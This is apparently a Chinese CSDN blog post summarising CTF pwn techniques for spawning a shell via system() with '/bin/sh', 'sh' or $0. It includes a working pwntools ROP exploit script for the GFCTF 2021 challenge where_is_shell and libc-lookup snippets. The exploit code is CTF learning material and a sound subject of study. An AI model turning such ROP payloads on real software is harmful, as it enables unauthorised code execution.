【PWN · 总结】system返回shell(‘/bin/sh‘、‘sh‘、$(0))

已于 2023-06-10 23:28:40 修改
阅读量3.3k 收藏 18
点赞数
分类专栏: 【PWN · 总结】 文章标签: ctf pwn /bin/sh system kali指令
于 2023-05-31 09:57:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/130962153
版权
本文详细介绍了在pwn题目中通过system调用获取shell的三种常见方式:/bin/sh,sh以及$0。作者列举了不同工具如strings,IDA,pwntools和ROPgadget在寻找这些字符串时的应用,并提供了exploit代码示例,强调了在不同场景下选择合适参数的重要性。此外,还提到了在找不到/bin/sh时,直接输入/bin/sh作为系统调用参数的策略。
摘要由CSDN通过智能技术生成

pwn题中要通过system/excute等返回shell,进而cat flag。今天遇到一题,参数$(0)也可返回,有必要记录一下。

目录

前言

一、'/bin/sh'

1.strings

2.IDA 

3.pwntools 

4.ROPgadget

5.libc中寻找

二、'sh'

三、$(0) 

exp

IDA查看机器码 

四、输入"/bin/sh"

总结

前言

就system的参数而言,'/bin/sh'、'sh'、$(0),这三者似乎都可以返回shell

一、'/bin/sh'

这个无需多说,然而查找方式可以总结一下

1.strings

linux的指令~

strings filename | grep /bin/sh

2.IDA 

shift+F12即可获取所有的字符串即位置

当然,我这个截图里面没有'/bin/sh'

3.pwntools 

pwntools里面的ELF对象,除了能够查看plt和got表信息(地址)、symbols查看标识位置,还可以通过search来找字符串

from pwn import *
p = process("filename")
bin_sh_addr = next(p.search("/bin/sh"))
#bin_sh_addr = p.search("/bin/sh").next()
#这个next的使用,据我印象,好像是因为python2到python3的缘故

4.ROPgadget

ROPgadget --binary filename --strings '/bin/sh'

5.libc中寻找

from LibcSearcher import *
#=====================================================之所以称为ret2libc:=======================================================
libc=LibcSearcher('puts',puts_real_addr)         #LibcSearcher,通过函数名和函数真实地址来找到对应的libc(之后会做选择,选择正确的那个即可) 
libc_addr=puts_real_addr-libc.dump("puts")       #libc的真实的基址=puts的真实地址-puts相对于libc基址的偏移量
bin_sh_addr=libc_addr+libc.dump("str_bin_sh")    #'/bin/sh'的真实地址=libc基址的真实地址+'/bin/sh'相对于libc基址的偏移量
system_real_addr=libc_addr+libc.dump("system")   #system函数的真实地址=libc基址的真实地址+system函数相对于libc基址的偏移量
#===============================================================================================================================

当然,如果给了本地文件,pwntools的ELF也可以类似于方法3找到字符串 

二、'sh'

这个是环境变量配置,做题的时候遇到过,用于替换‘/bin/sh',可以尝试一下

三、$(0) 

这是当前遇到的一道题目,[GFCTF 2021]where_is_shell

利用system($0)获得shell权限,$0在机器码中为 \x24\x30

题目给出了tips函数,这一串东西,是什么意思呢?地址也没有呀~

查看机器码

发现了24 30机器码,所以实际上我们可以把这里的地址作为参数。

exp

from pwn import *
from LibcSearcher import *

context(os='linux',arch='amd64',log_level="debug")
io=remote("node4.anna.nssctf.cn",28559)

elf=ELF("./shell")

system_plt=elf.symbols['system']
#system_plt=0x400430
'''
if system_plt!=elf.symbols['system']:
    print(system_plt,"  ",elf.symbols["system"])
'''
#这里的bin_sh实际上是\x24\x30开始的地址
bin_sh=0x400541
rdi=0x4005e3
ret=0x400416

payload=b'a'*(0x10+8)
payload+=p64(ret)
payload+=p64(rdi)+p64(bin_sh)
payload+=p64(system_plt)

io.sendlineafter(b'it?\n',payload)
io.interactive()

IDA查看机器码 

opcode bytes设置一下,保存即可 

四、输入"/bin/sh"

遇到找不到/bin/sh的问题,在不去libc找的情况下,观察程序输入输出关系,可以自己把"/bin/sh"输入,下面是典型的一题

【PWN · ret2text | ‘/bin/sh‘写在bss段】[HNCTF 2022 Week1]ezr0p32_Mr_Fmnwon的博客-CSDN博客

第一个read读入"/bin/sh"到.bss段

第二个栈溢出控制执行system("/bin/sh"):其中system通过plt等,参数为.bss上存储"/bin/sh"的地址 

总结

对于system参数的选取,有必要总结一下。优化大概率事件嘛。以后遇到也会持续更新啦

===================2023/6/10更新 第四部分输入"/bin/sh" ==================

Mr_Fmnwon
关注
  • 0
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
android中:/system/bin/sh: : No such file or directory错误
weixin_34220179的博客
02-25 1649
将一个raspberry下编译好的可执行文件放在android的system/bin下,修改为777权限,运行,出现下面的错误: /system/bin/sh: XXX: No such file or directory 这一般是系统的动态链接器与XXX这个程序中的动态链接器的名字或路径不对,在raspberry下执行: readelf -l 可执行文件名 输出: Elf file...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Pwn入门笔记(五)ROP
qq_33590156的博客
11-29 685
ROP32位的ROP64位的ROP 32位的ROP 这个在栈基础中提到过,此处写出是为了和64位的形成对比。通过在返回地址上写上函数PLT的地址来实现跳转到函数,调用函数时压入参数后会压入eip(返回地址),然后32位程序参数在栈上,所以结构如下图: 栈底-高地址-> c b a 实际调用函数中的返回地址eip dddd 原返回地址(r) system的plt表地址 原ebp (s) aaaa aaaaaaaaaaaaaaa… 栈顶-低地址-> …
[蓝桥杯2024]-PWN:fd解析(命令符转义,标准输出重定向,利用system(‘$0‘)获取shell权限)
2301_79326813的博客
04-27 588
查看保护查看ida这里有一次栈溢出,并且题目给了我们system函数。这里的知识点没有那么复杂。
GFCTF2021-where_is_shell
最新发布
sagic的博客
07-17 238
总而言之我们现在要构造的payload就是首先需要覆盖返回地址,然后使用ret弹出一个地址,再使用pop rdi ret 把我们的shell的地址存进rdi寄存器里,最后再调用system函数,因为rdi里存着shell函数的地址所以调用了system函数就等于system($0),因为rdi是64位传参中最先传输的。利用system($0)获得shell权限。正好tips函数中有我们需要的机器码。$0在机器码中为 \x24\x30。
在android系统命令行中执行arm linux程序,出现/system/bin/sh: .xxx No such file or directory问题
张大户的专栏
07-06 1万+
android系统的底层就是Linux,理论上arm linux程序在android系统中也能够运行。但是当我写了一个“Hello World”程序并运行时,出现了下面的错误: system/bin/sh:./ a.out No such file or directory。 提示找不到文件,a.out明明就在当前目录下,应该不是路径的问题。 ls / 根目录看了看,android文件系统和
Android system/bin 命令
java开发指南博客 【转载】
07-25 528
You could do something like that: public static boolean runRootCommand(String command) { Process process = null; DataOutputStream os = null; try { process = Runtime.getRuntime().exec("su"); os =...
解决:/system/bin/sh: ./hello: No such file or directory
JaniceZhou37的博客
12-31 1万+
android中执行C可执行文件时,出现/system/bin/sh: ./hello: No such file or directory 错误。 1. 问题: msm8909w:/data # ./hello /system/bin/sh: ./hello: No such file or directory 2. 解决方法: 使用静态链接库:在最后加上-static arm-linux-gnueabihf-gcc hello.c -o hello -static 3. debug过程: 查看hel
/system/bin/sh: disable-verity: not found 的解决方案
一位热心网友的博客
06-13 1775
虽然报错提示的路径是/system/bin/sh,但实际上这个命令依旧属于adb.exe这个程序,是windows端的adb.exe中没有这个命令可用。 找到问题的原因后,我从其他人电脑上拷贝了一个adb.exe过来就解决了这个报错。 最后将有disable-verity命令和没有disable-verity命令的adb程序一起提供给大家,大家可以自行测试。
browser_pwn:浏览器pwn,现在主要工作
03-22
总结来说,浏览器Pwn是一项涉及广泛的技术,涵盖了JavaScript引擎的安全性分析、漏洞挖掘、利用技巧,以及对C++和相关工具的深入理解。对于网络安全专家和开发者而言,掌握这些知识能有效提升浏览器的安全性和抵御...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
电源技术中的电感是PWN DC/DC转换器中常用的元件
11-16
电感是PWN DC/DC转换器中常用的元件,由于它的电流、电压相位不同,因此理论上损耗为零。电感常被用做储能元件,也常与电容共同在输 人滤波器和输出滤波器上用于平滑电流,故也常称为扼流圈。其特点是流过其上的电流...
电源技术中的电容是PWN DC/DC转换器中常用的元件
11-16
在电源技术中,电容是PWN DC/DC转换器不可或缺的元件,它与电感共同承担能量存储和传输的任务,但对频率响应的特性截然相反。电容的主要作用在于吸收纹波,平滑输出电压,从而确保电源的稳定。然而,实际应用中的...
攻防世界-PWN-shell
aptx4869_li的博客
05-29 347
攻防世界-PWN-shell 检查保护机制 healer@healer-virtual-machine:~/Desktop/shell$ checksec shell [*] '/home/healer/Desktop/shell/shell' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x4000
day5——system($0)
m0_73858054的博客
12-01 84
所以,无论是用哪种方式,最终达到的目的都是通过shell来执行特定的命令。但需要注意的是,在某些情况下,我怀疑ret那句话不能加的原因就是在这里,但是我不理解因为加上那句话之后payload的长度刚好满足0x38,很明显没有超过…这是因为两者都会调用系统的shell来执行参数中指定的命令。做这道题的时候他那个read限制读入的长度给我整麻了,虽然这里没啥影响,但是后面还是要注意一下。但是没有‘/bin/sh’字符串,不过在上面名为tips的函数中发现了$0的机器码。哎呀,昨天居然忘了发了,今天先发一下吧。
/system/bin/sh: disable-verity: not found
分享+记录
08-12 1944
解决/system/bin/sh: disable-verity: not found问题
关于/system/bin/sh: su: not found的解决办法(安卓模拟器运行)
weixin_42814000的博客
03-20 5989
在了解关于数据库的创建时,无法在android Studio的模拟器运行的条件下运行cmd 窗口下adb shell 命令,adb shell之后su无法转到root权限,导致无法进入data/data/…原因是 Android Studio带(Google Play)的模拟器无法获得root权限安装 该换成为带(Google APIs)的模拟器即可,类似于这种 ...
使用ADB出现了system/bin/sh: adb: not found&system/bin/sh: pull: not found错误
热门推荐
半不闲居士的博客
04-19 2万+
在使用ADB传送文件的时候出现了system/bin/sh: adb: not found&system/bin/sh: pull: not found错误 解决办法: 可能你在使用adb pull 之前你使用了adb shell,你需要先退出来,退出来的命令是exit,然后再使用adb pull就可以了 ...
Android—adb shell—/system/bin/sh: ./executer: No such file or directory
张同光 (Tongguang Zhang):Hello everyone !
02-01 4090
[root@localhost lib]# pwd /opt/cBPM-android/criteria-lin/lib [root@localhost lib]# adb push executer /data/data 3352 KB/s (22209660 bytes in 6.469s) [root@localhost lib]# adb shell root@mb526:/ #
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值